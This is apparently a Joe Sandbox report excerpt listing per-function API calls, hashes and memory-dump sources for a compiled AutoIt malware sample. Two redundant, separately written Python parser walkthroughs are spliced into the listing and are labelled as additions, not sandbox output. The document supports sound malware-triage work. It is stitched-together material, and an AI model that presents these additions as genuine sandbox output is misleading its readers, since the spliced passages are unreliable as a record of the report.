• Opcode ID: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
• Instruction ID: 897fc17f8cf10ec6d57a1eb8aa4b01478b0fe54be18ca88aed40e457f6cdf7ad
• Opcode Fuzzy Hash: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
• Instruction Fuzzy Hash: EE619A706083129FD711DF54C848B6EBBE8EF49754F04845EFAC29B295CB78EA44CB92
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 01015793
• inet_addr.WSOCK32(?,?,?), ref: 010157D8
• gethostbyname.WSOCK32(?), ref: 010157E4
• IcmpCreateFile.IPHLPAPI ref: 010157F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01015862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01015878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 010158ED
• WSACleanup.WSOCK32 ref: 010158F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
• Instruction ID: d52cf19432de51dbdede2190b6320cf10555723fe682f3c8cb75efd34091e3f1
• Opcode Fuzzy Hash: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
• Instruction Fuzzy Hash: 1651B1716043019FDB20DF28DC46B2ABBE4EF8A710F044569F996EB295DB78E800DB52
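The function entries in this part of the report are library routines of the interpreter (the overview flags the sample as a compiled AutoIt script), and the listing format is regular enough to machine-read: one "APIs" header per function, one bullet per call with module, static argument values and a reference address, then the String ID and hash fields. The Python below is an added example, not output of Joe Sandbox or code from the sample: it parses entries in that format, maps the calls to coarse capability labels (a vocabulary chosen for this example), and names the positional arguments of the IcmpSendEcho call above using the documented prototype (IcmpHandle, DestinationAddress, RequestData, RequestSize, RequestOptions, ReplyBuffer, ReplySize, Timeout), so the 0x29 reply buffer reads as 28-byte ICMP_ECHO_REPLY + 5 bytes of request data + the 8 bytes the documentation reserves for an ICMP error message, and 0xFA0 as a 4000 ms timeout. The 28-byte struct size assumes a 32-bit build (the 0x00FAxxxx image base in the report); the sample text is transcribed from three entries on this page with the repeated "Memory Dump Source" block abbreviated.

```python
"""Parse Joe Sandbox 'IDA Plugin' function entries and triage their API calls."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three entries transcribed from the report, with the repeated
# "Memory Dump Source" block abbreviated. Not verbatim sandbox output.
SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 01015793
• inet_addr.WSOCK32(?,?,?), ref: 010157D8
• gethostbyname.WSOCK32(?), ref: 010157E4
• IcmpCreateFile.IPHLPAPI ref: 010157F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01015862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01015878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 010158ED
• WSACleanup.WSOCK32 ref: 010158F3
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• Opcode ID: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0100B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0100B546
• GetLastError.KERNEL32 ref: 0100B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0100B5BD
Similarity
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
APIs
  • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
• CoCreateInstance.OLE32(?,00000000,00000017,01032BEC,?), ref: 0101846E
Similarity
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
"""

# One call bullet: optional "Part of subcall" prefix, Name.MODULE, optional (args), ref.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@$?]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID):\s*(.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # int for hex literals, None for '?', str otherwise
    ref: int
    subcall_of: Optional[int] = None  # set for "Part of subcall function" bullets


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    string_id: str = ""
    api_id: str = ""
    opcode_id: str = ""

    @property
    def strings(self) -> List[str]:   # "A$B$C" -> ["A", "B", "C"]
        return self.string_id.split("$") if self.string_id else []


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                   # value not recoverable statically
    if re.fullmatch(r"-?[0-9A-F]{8}", tok):
        return int(tok, 16)           # keeps the sign of e.g. -00000001
    return tok                        # symbolic argument such as a string literal


def parse_report(text: str) -> List[FunctionEntry]:
    """Split the listing at each 'APIs' header; collect that entry's calls and IDs."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
        elif cur is not None and (f := FIELD_RE.match(line)):
            setattr(cur, f.group(1).lower().replace(" ", "_"), f.group(2))
    return entries


# Capability labels are this example's own triage vocabulary, not Joe Sandbox's.
CAPABILITY = {
    "IcmpCreateFile": "icmp-echo", "IcmpSendEcho": "icmp-echo",
    "gethostbyname": "dns-resolve", "WSAStartup": "winsock", "inet_addr": "winsock",
    "GetDiskFreeSpaceW": "drive-probe", "CoCreateInstance": "com-instantiate",
}


def capabilities(entry: FunctionEntry) -> List[str]:
    return sorted({CAPABILITY[c.name] for c in entry.calls if c.name in CAPABILITY})


# sizeof(ICMP_ECHO_REPLY) on 32-bit Windows; assumed because the image base and every
# ref in the report are 32-bit addresses.
ICMP_ECHO_REPLY_SIZE32 = 28


def decode_icmp_send_echo(call: ApiCall) -> dict:
    """Name IcmpSendEcho's positional args and apply the documented buffer rule:
    ReplySize >= sizeof(ICMP_ECHO_REPLY) + RequestSize + 8 (room for an ICMP error)."""
    assert call.name == "IcmpSendEcho" and len(call.args) == 8
    _, _, _, req_size, _, _, reply_size, timeout = call.args
    min_reply = ICMP_ECHO_REPLY_SIZE32 + req_size + 8
    return {"request_size": req_size, "reply_size": reply_size, "timeout_ms": timeout,
            "min_reply_size": min_reply, "reply_size_ok": reply_size >= min_reply}
```

Running `parse_report(SAMPLE)` yields three entries; for the first, `capabilities()` gives `dns-resolve`, `icmp-echo` and `winsock`, and `decode_icmp_send_echo()` on its fifth call reports a 5-byte request, a 41-byte reply buffer that exactly meets the 28 + 5 + 8 minimum, and a 4000 ms timeout. Static `?` arguments stay `None`, so the destination address is correctly reported as unknown from the listing alone; it has to come from the dynamic trace.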
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0100B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0100B546
• GetLastError.KERNEL32 ref: 0100B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0100B5BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
• Instruction ID: 7b11e9badf09275f4636cd53ead672d6c1cad404faa4da42d826f5ea156d8517
• Opcode Fuzzy Hash: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
• Instruction Fuzzy Hash: 8F31A579A002059FE751DF68CC45FAE7BB4FF09301F1441AAE941EB2D1DB769901CB51
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FF9014
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00FF901F
                                                                                                                                    • GetParent.USER32 ref: 00FF903B
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF903E
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FF9047
                                                                                                                                    • GetParent.USER32(?), ref: 00FF9063
                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF9066
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                    • Opcode ID: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
                                                                                                                                    • Instruction ID: 9c04a728a7c92de148ed8de90209ac7b5518a2db9afeb5e1a357ff38f3ef0cd8
                                                                                                                                    • Opcode Fuzzy Hash: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
                                                                                                                                    • Instruction Fuzzy Hash: 7C21B2B4A00109BBDF24AFB0CC85EBEBB74EF49350F100119FA61972A1DB795819EB20
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FF90FD
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00FF9108
                                                                                                                                    • GetParent.USER32 ref: 00FF9124
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF9127
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FF9130
                                                                                                                                    • GetParent.USER32(?), ref: 00FF914C
                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF914F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                    • Opcode ID: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
                                                                                                                                    • Instruction ID: 21126cf7a5dffb3d16521d806bc0b9b64cf3cc102e3921c643cee19bbd8b6567
                                                                                                                                    • Opcode Fuzzy Hash: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
                                                                                                                                    • Instruction Fuzzy Hash: D121C4B4A00109BBDF20AFA0CC89FFEBB74EF49300F100019FA51972A5DB794419EB20
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32 ref: 00FF916F
                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00FF9184
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FF9196
                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FF9211
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                                    • Opcode ID: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
                                                                                                                                    • Instruction ID: 6c67cc9efbb5526c374b58321db88cf62953f8bf1af7e60aca7260a4531dc07b
                                                                                                                                    • Opcode Fuzzy Hash: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
                                                                                                                                    • Instruction Fuzzy Hash: FA11A73B64C30BB9EB252525DC0BFB737ACDF15770B20002AFE00E54B5EEA659517694
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 010188D7
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 01018904
                                                                                                                                    • CoUninitialize.OLE32 ref: 0101890E
                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 01018A0E
                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 01018B3B
                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01032C0C), ref: 01018B6F
                                                                                                                                    • CoGetObject.OLE32(?,00000000,01032C0C,?), ref: 01018B92
                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 01018BA5
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01018C25
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 01018C35
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2395222682-0
                                                                                                                                    • Opcode ID: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
                                                                                                                                    • Instruction ID: dcad1cdb61a8e734f9c5dfef949c68b352b2a8870247f05aefe87752098f4e2a
                                                                                                                                    • Opcode Fuzzy Hash: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
                                                                                                                                    • Instruction Fuzzy Hash: 56C136B1208305AFD700DF68C88492BBBE9FF89748F04895DF9899B251DB75EE05CB52
                                                                                                                                    APIs
                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01007A6C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1725837607-0
                                                                                                                                    • Opcode ID: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
                                                                                                                                    • Instruction ID: d9e0c736ed0faa9c38062661b151cba33affd7a40e7c8ce02a6eafad0a748775
                                                                                                                                    • Opcode Fuzzy Hash: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
                                                                                                                                    • Instruction Fuzzy Hash: 67B1627190020A9FEB12DF98C885BBEBBF4FF49321F144469E6C1E7281D779A941CB91
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 010011F0
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01000268,?,00000001), ref: 01001204
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0100120B
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 0100121A
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100122C
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001245
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001257
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 0100129C
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012B1
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012BC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                    • Opcode ID: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
                                                                                                                                    • Instruction ID: 7cfe4f23110d39a0eb38d3baf1abb0c7747d4fe531bf5aa4d56806c6d1d956bd
                                                                                                                                    • Opcode Fuzzy Hash: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
                                                                                                                                    • Instruction Fuzzy Hash: DB31CEB5600204BBFB329F68D988FA93BFDEB58351F214155F980C61DAD77AD9408B60
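The blocks above are the Joe Sandbox IDA plugin's per-function summaries: the function's own API calls, calls made inside its subcalls, the '$'-joined API ID and String ID, and the opcode and instruction hashes used for similarity matching. What follows is an added example, not Joe Security's code and not part of this report: a Python parser for that layout plus a triage pass that reduces the long listing to the functions that directly call an API of interest. The sample input is constructed from two of the blocks above (table indentation and "Download File" link labels removed); the watchlist is an assumption picked for this report and should be adjusted per case.

```python
"""Parse Joe Sandbox IDA-plugin function summaries and triage them by API.
Added example, not Joe Security's code and not part of the report: it reads the
APIs / Memory Dump Source / Similarity blocks and flags watched direct calls."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample input: two blocks copied from the report layout above,
# with the table indentation and the "Download File" link labels removed.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 010011F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,01000268,?,00000001), ref: 01001204
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 0100121A
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FF9014
• GetDlgCtrlID.USER32 ref: 00FF901F
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
"""

# One call line: optional "Part of subcall function <addr>:", Name.MODULE, optional (args), "ref: <addr>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Any other "• Key: value" bullet (Source File, API ID, Opcode ID, ...).
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                        # address of the call site
    args: list[str]                 # "?" marks an argument the plugin could not resolve
    subcall_of: str | None = None   # set when the call sits inside a callee

@dataclass
class FunctionSummary:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)

    @property
    def direct_apis(self) -> set[str]:
        # APIs the function itself calls; entries attributed to subcalls are excluded
        return {c.name for c in self.calls if c.subcall_of is None}

    @property
    def strings(self) -> list[str]:
        # "String ID" is a '$'-joined list; empty when the function uses no strings
        return [s for s in self.meta.get("String ID", "").split("$") if s]

def parse_summaries(text: str) -> list[FunctionSummary]:
    """Start a new record at every 'APIs' header; bullets feed the current record."""
    out: list[FunctionSummary] = []
    cur: FunctionSummary | None = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = FunctionSummary()
            out.append(cur)
            continue
        if cur is None or not stripped.startswith("•"):
            continue  # bare section headers (Strings, Similarity, ...) carry no data
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(ApiCall(m.group("name"), m.group("module"),
                                     m.group("ref").upper(), args, m.group("sub")))
        elif (m := FIELD_LINE.match(line)):
            cur.meta[m.group("key")] = m.group("val")
    return out

# Assumed watchlist for this report: APIs seen in the blocks above that bear on its
# signatures (input-thread attachment, COM object retrieval, window messaging).
WATCHLIST = {"AttachThreadInput", "CoGetObject", "CoGetInstanceFromFile",
             "GetRunningObjectTable", "SendMessageW"}

def triage(summaries: list[FunctionSummary], watchlist: set[str] = WATCHLIST):
    """(Opcode ID, sorted watched APIs) for every function that directly calls one."""
    hits = []
    for s in summaries:
        matched = sorted(s.direct_apis & watchlist)
        if matched:
            hits.append((s.meta.get("Opcode ID", ""), matched))
    return hits
```

Matching on direct calls rather than the whole call list keeps shared helpers such as _memmove or GetClassNameW, which the plugin lists as subcalls, from pulling every caller into the hit set; the Opcode ID carried in each hit is the key to compare against other reports' Similarity sections.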
                                                                                                                                    APIs
                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FAFAA6
                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00FAFB45
                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00FAFC9C
                                                                                                                                    • DestroyWindow.USER32(?), ref: 00FE45D6
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00FE463B
                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FE4668
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
